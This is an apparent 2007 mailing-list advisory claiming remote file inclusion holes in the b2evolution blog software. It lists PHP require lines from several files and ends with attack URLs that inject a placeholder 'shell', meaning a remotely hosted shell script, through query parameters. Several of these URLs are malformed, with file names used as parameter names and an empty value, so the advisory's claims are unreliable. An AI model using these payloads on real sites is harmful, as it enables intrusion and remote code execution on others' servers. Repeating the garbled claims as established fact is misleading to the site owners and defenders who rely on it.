Remote File Inclusion
Date: 25 Apr 2007 15:37:24 -0000
From: [email protected]
To: [email protected]
Subject: Remote File Inclusion
X-Virus-Scanned: antivirus-gw at tyumen.ru
####################################################
# b2evolution Remote File Inclusion #
####################################################
Affected Software .: b2evolution #
Download..: http://b2evolution.net/ #
Risk ..............: high #
Date .........: 25/4/2007 #
Found by ..........: s433d_only_linux #
Contact ...........: [email protected] #
Web .............: Www.hackerz.ir #
special thanx ........... Ali Jasbi my beste friend#
####################################################
####################################################
Affected File:
b2evolution\blogs/a_noskin.php require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/a_stub.php require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/admin.php require_once $inc_path.'_main.inc.php';
b2evolution\blogs/admin.php require $view_path.'errors/_access_denied.inc.php';
b2evolution\blogs/admin.php require_once $inc_path.'_async.inc.php';
b2evolution\blogs/admin.php require $control_path.$ctrl_mappings[$ctrl];
b2evolution\blogs/contact.php require_once $inc_path.'_main.inc.php';
b2evolution\blogs/contact.php require $skins_path.'_msgform.php';
b2evolution\blogs/default.php require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php require_once $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php require $skins_path.'_bloglist.php';
b2evolution\blogs/multiblogs.php require $skins_path.'_feedback.php';
######################################################
b2evolution\blogs/a_noskin.php?require=shell?
b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=
b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=shell